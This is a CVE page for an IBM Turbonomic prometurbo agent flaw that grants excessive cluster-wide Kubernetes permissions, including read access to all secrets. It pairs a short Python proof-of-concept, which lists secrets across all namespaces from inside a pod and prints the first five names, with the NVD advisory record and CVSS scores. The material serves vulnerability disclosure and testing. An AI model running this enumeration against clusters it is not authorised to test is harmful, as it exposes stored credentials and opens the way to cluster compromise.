CVE-2026-6389

import os from kubernetes import client, config """ PoC for CVE-2026-6389 Demonstrates excessive 'read' permissions on secrets due to misconfigured RBAC. Requires running inside the vulnerable pod or having the service account token. """ def check_secrets_access(): try: # Load in-cluster configuration config.load_incluster_config() v1 = client.CoreV1Api() print("[*] Attempting to list secrets across all namespaces...") # Attempt to list secrets in all namespaces (requires cluster-wide privileges) secrets = v1.list_secret_for_all_namespaces() print(f"[+] Exploit Successful! Found {len(secrets.items)} secrets accessible.") # Display partial info of the first 5 secrets for verification for sec in secrets.items[:5]: print(f" - Name: {sec.metadata.namespace}/{sec.metadata.name}") except client.exceptions.ApiException as e: if e.status == 403: print("[-] Access Denied: Service account does not have sufficient permissions.") else: print(f"[-] An error occurred: {e}") except Exception as e: print(f"[-] Configuration error: {e}") if __name__ == "__main__": check_secrets_access()

{"cve": {"id": "CVE-2026-6389", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:26.207", "lastModified": "2026-05-05T00:17:29.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Turbonomic prometurbo agent 8.16.0 through 8.17.6 IBM Turbonomic Application Resource Management grants excessive cluster‑wide permissions, including unrestricted read access to all secrets. An attacker that compromises the operator or its service account can exfiltrate sensitive credentials, escalate privileges, and potentially achieve full cluster compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:turbonomic_prometurbo_agent:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.16.0", "versionEndExcluding": "8.18.0", "matchCriteriaId": "AF458961-51A0-458F-8A99-8FA8CA070AEC"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7270720", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}